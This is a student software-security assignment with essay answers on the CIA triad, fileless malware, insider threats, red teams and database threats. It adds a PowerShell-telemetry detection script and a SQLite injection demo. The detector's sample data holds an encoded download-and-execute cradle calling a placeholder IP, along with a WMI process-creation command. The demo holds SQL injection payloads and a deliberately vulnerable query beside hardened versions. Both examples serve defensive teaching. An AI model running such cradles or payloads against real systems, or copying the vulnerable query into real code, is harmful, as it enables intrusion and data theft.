Com508 Assignment1
CHAPTER- 1
1Q: Define the primary elements of the CIA triad in your own words. Are
the three areas of emphasis in this model comprehensive of modern threats to a
software system? Give examples.
Ans: Confidentiality, Integrity, and Availability are the three core components
of the CIA triad, an information security model intended to guide an organization's
security processes and policies. The model is sometimes called the AIC triad
(availability, integrity, and confidentiality) to avoid confusion with the Central
Intelligence Agency. The CIA triad is widely accepted as a reference model in
information security.
Confidentiality: Confidentiality in software means that the private and sensitive
information handled by the application cannot be read by anyone who is not
explicitly authorized to view it. For instance, when you log in you are asked for a
password, and if it has been a while since your last log-in you may also be asked to
enter a code that was sent to you, or some other form of two-factor
authentication, before the data is shown.
Integrity: Integrity means that the data processed by an application is
not changed through any unauthorized channel or by any unauthorized person.
This is a concern in stand-alone programs as well as in networked
applications: data must be maintained in a correct state, kept so that it cannot
be tampered with, and remain accurate, complete, and reliable. For example,
ATM and banking software enforce data integrity by ensuring that any
transfer or withdrawal made through the system is reflected exactly in the accounting
for the user's bank account.
Availability: Availability refers to the system's ability to remain operational even
in the face of failure or attack. While it is critical that unauthorized users are kept
out of an organization's data, that data must also be available to authorized users
whenever they require it. This means keeping systems, networks, and devices
up and running. For example, you can log into your account whenever
you want, and you may also be able to contact customer service at any
time of the day or night.
2Q . Of the different automated attack tools and malicious software threats,
which do you see as the most significant threat? Consider the scope of the
distribution as well as the potential to exploit specific targets in your
evaluation.
Ans: Of the different attack tools and malicious software threats, I see fileless
malware as the most significant. Unlike traditional malware, which uses executable files to infect devices,
fileless malware does not directly touch files or the file system. Instead, it
abuses non-file objects such as Microsoft Office macros, PowerShell, WMI,
and other legitimate system tools. A notable example of a fileless malware attack
was Operation Cobalt Kitty, in which the OceanLotus group infiltrated several
corporations and conducted nearly six months of stealthy operations before being
detected. Because there is no executable file on disk, it is difficult for file-scanning antivirus software to
protect against fileless malware. To defend against it, make sure that users only
have the rights and privileges they need to do their jobs. This limits what an attacker
who lands fileless code in a user's session can reach, including employee credentials and
restricted data. In addition, disable or restrict Windows tools like PowerShell for
users who do not need them. Fileless malware can do anything that "regular" malware
can do, but for practical reasons the fileless component itself is usually kept small.
For more complex programs like ransomware, the
fileless stage often acts as a dropper, meaning the first stage downloads and
executes the bigger program, which is the actual payload. And, of course, fileless
malware uses the native, legitimate tools built into a system throughout the attack.
The most common use cases for fileless malware are:
* Initial access. The first step of a cyberattack is to gain a foothold on a
system. This can be done by stealing credentials or exploiting a vulnerability in an
access point.
* Credential harvesting. Fileless malware is sometimes used to hunt for
credentials, so that an attacker can use alternative entry points or elevate their
privileges.
* Persistence. To ensure they keep access to a compromised
system, an attacker may use fileless malware to create a backdoor.
* Data exfiltration. An attacker may use fileless malware to hunt for useful
information, such as the victim's network configuration.
* Dropper and/or payload. A dropper downloads and starts other malware
(the payload) on a compromised system. The payload may arrive as a file, or
it can be read from a remote server and loaded directly into memory.
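Because the cradle, the decoder and the payload all run through legitimate tools, detection has to look at what those tools were asked to do rather than at files. As an added example that is not part of the original assignment, the Python script below scans PowerShell command lines for the indicators the answer above describes: download cradles, in-memory execution, encoded or hidden invocations, and WMI process creation. It also decodes an -EncodedCommand argument (base64 of the UTF-16LE script text, which is how PowerShell defines that switch) and scans the decoded script as well, so encoding does not hide the cradle. The sample events, the indicator names and the regular expressions are assumptions constructed for the illustration; in practice the input would be PowerShell script block logging (Event ID 4104) or EDR process telemetry.

```python
import base64
import re

# Indicator patterns for the tools fileless malware abuses. These are
# illustrative assumptions for this example, not a vendor rule set.
INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\bIWR\b|Net\.WebClient",
        re.IGNORECASE),
    "in_memory_exec": re.compile(
        r"Invoke-Expression|\bIEX\b|Reflection\.Assembly\]::Load", re.IGNORECASE),
    "encoded_or_hidden": re.compile(
        r"-(?:e|ec|enc|encodedcommand)\s|FromBase64String"
        r"|-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b", re.IGNORECASE),
    "wmi_process_create": re.compile(
        r"Invoke-WmiMethod|Invoke-CimMethod|Win32_Process", re.IGNORECASE),
}

# PowerShell's -EncodedCommand carries base64 of the UTF-16LE script text.
ENCODED_RE = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(text):
    """Return the script hidden behind an -EncodedCommand argument, or None."""
    match = ENCODED_RE.search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not valid base64 / not UTF-16LE
        return None


def analyze_event(text):
    """Sorted names of the indicators that fire on one command line or script
    block. The decoded -EncodedCommand payload is scanned as well."""
    decoded = decode_encoded_command(text)
    haystack = text if decoded is None else text + "\n" + decoded
    return sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))


def triage(events):
    """(index, indicators) for every event that fires at least one indicator."""
    hits = []
    for i, event in enumerate(events):
        found = analyze_event(event)
        if found:
            hits.append((i, found))
    return hits


# Constructed sample telemetry (assumption for this example, not real logs).
CONSTRUCTED_CRADLE = (
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage1.ps1')")
SAMPLE_EVENTS = [
    "Get-ChildItem C:\\Users\\alice\\Documents",
    "powershell.exe -nop -w hidden -EncodedCommand "
    + base64.b64encode(CONSTRUCTED_CRADLE.encode("utf-16-le")).decode("ascii"),
    "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd /c whoami'",
    "Get-Process | Where-Object CPU -gt 100",
]

if __name__ == "__main__":
    for index, indicators in triage(SAMPLE_EVENTS):
        print(index, indicators)
        decoded = decode_encoded_command(SAMPLE_EVENTS[index])
        if decoded:
            print("   decoded:", decoded)
```

The point of decoding before matching is the caveat from the answer: an attacker who knows the defender matches on "DownloadString" simply encodes the command, so a rule that only inspects the raw command line sees nothing but "-EncodedCommand" and a blob. Matching on the switch itself is a useful weak signal, but the strong signals only appear once the payload is decoded.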
3Q. Which do you see as more destructive: the unwitting insider who complies
with an attack, or the intentional external attacker who is trying to break the
system's defenses? Consider system access and the likelihood of success and
repetition in your evaluation.
Ans. An insider threat is, by the usual definition, a security risk that originates from within the
affected organization. The root of the problem is a person with enough inside knowledge of the
business to cause damage. This does not necessarily mean the threat comes from a current
employee or officer of the organization; it can come from a consultant, business partner,
former employee, or board member. Internal actors were involved in 34% of data breaches,
according to the 2019 Verizon Data Breach Investigations Report. According to the
survey cited with it, 17% of an organization's classified files were accessible to all employees.
These figures show that insiders have the knowledge, the motive, and the access needed to steal sensitive
company data. It is the CISO's job to protect the company from such threats.
Anyone with specialized knowledge of, and/or authorized access to, an organization's classified data,
information technology, or network resources is considered a potential
insider threat. Learning about them and the risks they pose will
save a great deal of pain. The most significant gain from an insider-threat program is that it protects
the business against identity misuse and the consequences of a data
breach, so the cost of remediating any insider-related breach is
reduced. Another benefit of the monitoring tooling used in such a program is that it
can track current employees, contractors, suppliers, or colleagues,
allowing you to recognize the organization's most significant threats.
Because an insider already holds legitimate access, an attack that goes through them is more likely
to succeed, harder to detect, and easier to repeat than an external attempt that must first get past
the perimeter, which is why I consider the unwitting insider the more destructive of the two.
4Q: What are the benefits and risks of using an external Red team to
attack your software system for design flaws and vulnerabilities? What are
the three issues that would help decide on whether or not to employ this
tactic?
Ans: Red teaming is a step above traditional penetration (pen) testing:
it simulates real-world attacks by replicating the
Tactics, Techniques, and Procedures (TTPs) of real-world adversaries. A
red team engagement differs from conventional pen testing in that it is
executed from as close to a zero-knowledge perspective as possible, which
means the organization as a whole is not notified ahead of time, nor is the red
team given any prerequisite information up-front. The role of the red
team (which is often independent of the organization, but can also be an internal
team) is to simulate an attack on the target organization, whereas the blue team
(usually an internal security team, but possibly outsourced) has to defend the
organization against the simulated attack.
Benefits: Adopting a red team approach lets an organization actively
test its existing cyber defenses and capabilities in a low-risk environment.
By engaging these two teams, it is possible to continually evolve the
organization's security approach based on its specific weaknesses and
vulnerabilities, as well as the latest real-world attack techniques. Red teaming helps to:
1. Identify misconfigurations and coverage gaps in existing security products
2. Strengthen network defenses to detect targeted attacks and
improve breakout time
3. Raise healthy competition among security staff and foster
cooperation between the IT and security teams
4. Elevate awareness among staff of the human vulnerabilities
that may compromise the organization's security
5. Build the skills and maturity of the organization's security capabilities in a
safe, low-risk training environment.
6Q. Why is controlling the misbehavior of software as important as
software behaving as expected during execution?
Ans: Making a software program was originally a straightforward constructive
exercise: you knew what you wanted to build, and you worked on
building it. With the amount of power technology now wields, the world and its
money ride on a network and on the software at the end of it. And
software is no longer just about "making it work", but also about "making it not
harm". This is not only a defensive method of coding, but a shift in
mindset about how we view a software system. Test cases and use cases
are built in at the requirements-gathering stage, and software must
be developed to fail safely. Each line of code should do only what it is
supposed to, and no more. And every module needs to be enveloped with
exception handlers and catch-alls. As lives and systems become increasingly
digitized, hacking is no longer a game played by misguided teenagers. It is
organized crime. Cybercriminals work around the clock to find
vulnerabilities, backdoors, exploitable loopholes, and any chink in the
software's armor. Heartland Payment Systems, a payment processing company, had a
website that was coded to do what it should: help customers and
clients interact with it easily and process their online transactions.
CHAPTER- 2
1Q. In a networked software system, what are the most vulnerable system
components that would be a primary target? Assume a general application
as the basis of your analysis.
Ans: A network vulnerability is a weakness or flaw in software,
hardware, or organizational processes which, when exploited by a threat,
can result in a security breach. Non-physical network vulnerabilities usually
involve software or data. For instance, an operating system (OS) is likely to be vulnerable
to network attacks if it is not updated with current security
patches. If left unpatched, a virus could infect the OS, the host it
runs on, and potentially the entire network. Physical network
vulnerabilities concern the physical security of an asset, such as locking a
server in a rack closet or securing an entry point with a turnstile.
Network vulnerabilities come in many forms, but the
most common types are:
Malware, short for malicious software, including Trojans, viruses, and worms
that are installed on a user's machine or a host server.
Social engineering attacks that fool users into giving up personal information such
as a username or password.
Outdated or unpatched software that exposes the systems running the
software and potentially the entire network.
Misconfigured firewalls / operating systems that allow traffic they should not, or that still have default rules
enabled.
Of these, malware (malicious software) is the primary threat to those components.
Malware is malicious software that is unknowingly purchased, downloaded, or
installed. Systems infected with malware show symptoms such as running slower,
sending emails without user action, randomly rebooting, or starting unknown
processes.
The most common kinds of malware encompass:
Viruses
Keyloggers
Worms
Trojans
Ransomware
Logic Bombs
Bots/Botnets
Adware & Spyware
Rootkits
Malware is often delivered through phishing emails. Typically, threat actors send
employees emails containing links to websites, or embed attachments
in the email itself. If the action is taken, such as clicking
the link or downloading the attachment, the malicious code is executed
and you can consider yourself breached.
4Q: Are all software system attacks targeted at gaining information or
access to information? Justify your position on this.
Ans: Regardless of whether an attack is targeted or untargeted, or whether the
attacker is using commodity or bespoke tools, cyber attacks have a number of
stages in common. An attack, particularly if it is carried out
by a persistent adversary, may repeat stages. The attacker
is effectively probing your defenses for weaknesses that, if exploitable, will take
them closer to their ultimate goal. Understanding these stages will help
you defend yourself better.
We have adopted a simplified version of the Cyber Kill Chain (produced by
Lockheed Martin) to describe the four main stages present in most cyber
attacks:
Survey - investigating and analyzing available information about the target in order to
identify potential vulnerabilities
Delivery - getting to the point in a system where a vulnerability can be
exploited
Breach - exploiting the vulnerability or vulnerabilities to gain some form
of unauthorized access
Affect - carrying out activities within a system that achieve the attacker's
goal
3Q: What are the primary threats to a database system? What mitigation
techniques are available to help protect data from a database at rest?
Ans: The threats identified over the past couple of years are the same ones that
continue to plague organizations today, according to Gerhart. The
most common database threats include:
*Excessive privileges. When users are granted default database privileges that
exceed the requirements of their job functions, those privileges can be abused,
Gerhart said. "For example, a bank employee whose job requires
the ability to change only account holder contact information may take
advantage of excessive database privileges and increase the account balance of a
colleague's savings account." Further, some businesses fail to update
access privileges for employees who change roles within an
organization or leave altogether.
*Legitimate privilege abuse. Users may also abuse legitimate database privileges
for unauthorized purposes, Gerhart said.
*Database injection attacks. The major types of database injection attacks
are SQL injections that target traditional database systems and NoSQL
injections that target "big data" platforms. "An important
point to recognize here is that, although it is technically true that big
data solutions are impervious to SQL injection attacks because they
don't use any SQL-based technology, they are, in fact, still susceptible to
the same fundamental class of attack," Gerhart said. "In both types,
a successful input injection attack can give an attacker unrestricted access to an
entire database."
*Malware. A perennial threat, malware is used to steal sensitive data
via legitimate users using infected devices.
*Storage media exposure. Backup storage media is often completely
unprotected from attack, Gerhart said. "As a result, numerous security breaches
have involved the theft of database backup disks and tapes. Furthermore,
failure to audit and monitor the activities of administrators who have low-level access to
sensitive information can put your data at risk. Taking the appropriate
measures to protect backup copies of sensitive data and monitor your most
highly privileged users is not only a data security best
practice, but also mandated by many regulations," he said.
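The excessive-privileges point (the teller who should only be able to change contact details) and the injection point both come down to whether the database itself enforces a boundary that the application code does not. As an added example, not part of the original assignment or of Gerhart's material, the Python script below uses the standard-library sqlite3 module to show both sides: a string-built query that lets the caller rewrite the SQL next to the parameterised form that does not, and an authorizer callback that denies every write except an update of the contact column, so the balance cannot be changed even through an injected statement. The accounts table, the names and balances, and the "teller" policy are constructed for this illustration; SQLite has no GRANT, so the policy lives in an authorizer callback, whereas in a server RDBMS the same policy would be expressed with GRANT on a role created for that one application function.

```python
import sqlite3


def build_db():
    """Constructed sample data (assumption for this example, not real records)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts "
        "(id INTEGER PRIMARY KEY, owner TEXT, contact TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts (owner, contact, balance) VALUES (?, ?, ?)",
        [("alice", "alice@example.org", 120),
         ("bob", "bob@example.org", 55),
         ("carol", "carol@example.org", 900)])
    conn.commit()
    return conn


def lookup_vulnerable(conn, owner):
    """Vulnerable on purpose: the value is pasted into the SQL text, so whoever
    controls 'owner' also controls the structure of the query."""
    sql = f"SELECT owner, balance FROM accounts WHERE owner = '{owner}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, owner):
    """Hardened form: the SQL text is fixed and the driver binds the value, so
    quotes and keywords inside 'owner' are just characters in a string."""
    return conn.execute(
        "SELECT owner, balance FROM accounts WHERE owner = ?", (owner,)).fetchall()


# Least-privilege policy for a hypothetical "teller" role: read the table,
# update only the contact column, and nothing else. SQLite consults the
# authorizer for every operation while it compiles a statement; a DENY makes
# the whole statement fail before it runs.
ALLOWED_ACTIONS = {
    sqlite3.SQLITE_SELECT, sqlite3.SQLITE_READ, sqlite3.SQLITE_FUNCTION,
    sqlite3.SQLITE_TRANSACTION, sqlite3.SQLITE_SAVEPOINT,  # BEGIN/COMMIT bookkeeping
}


def teller_authorizer(action, arg1, arg2, db_name, trigger_or_view):
    if action in ALLOWED_ACTIONS:
        return sqlite3.SQLITE_OK
    if action == sqlite3.SQLITE_UPDATE and (arg1, arg2) == ("accounts", "contact"):
        return sqlite3.SQLITE_OK
    return sqlite3.SQLITE_DENY  # INSERT, DELETE, DROP, UPDATE of any other column


def as_teller(conn):
    """Attach the policy. Do it before the application runs any statements: the
    check happens at prepare time, so statements compiled earlier and kept in
    the driver's statement cache are not re-checked."""
    conn.set_authorizer(teller_authorizer)
    return conn


def attempt(conn, sql, params=()):
    """Run one write and report whether the authorizer let it through."""
    try:
        conn.execute(sql, params)
        conn.commit()
        return "allowed"
    except sqlite3.DatabaseError as exc:  # "not authorized" surfaces here
        return f"denied: {exc}"


if __name__ == "__main__":
    db = build_db()
    payload = "x' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, payload))  # every account
    print("safe:      ", lookup_safe(db, payload))        # no such owner
    print("schema:    ", lookup_vulnerable(
        db, "' UNION SELECT name, sql FROM sqlite_master --"))  # table definitions
    teller = as_teller(build_db())
    print(attempt(teller, "UPDATE accounts SET contact = ? WHERE owner = ?",
                  ("alice@new.example", "alice")))
    print(attempt(teller, "UPDATE accounts SET balance = balance + 1000 WHERE owner = ?",
                  ("bob",)))
    print(attempt(teller, "DELETE FROM accounts WHERE owner = ?", ("carol",)))
```

Two details worth noticing. The UNION payload shows that an injection does not need to modify anything to be damaging: reading sqlite_master hands the attacker the schema, which is the "unrestricted access" Gerhart describes. And the authorizer is deliberately deny-by-default with a short allow list, so a new kind of write added later (a DROP, an ALTER, an UPDATE of a column that did not exist when the policy was written) is refused until someone decides it should be allowed; that is the opposite of the "default privileges that exceed the job" situation in the first bullet.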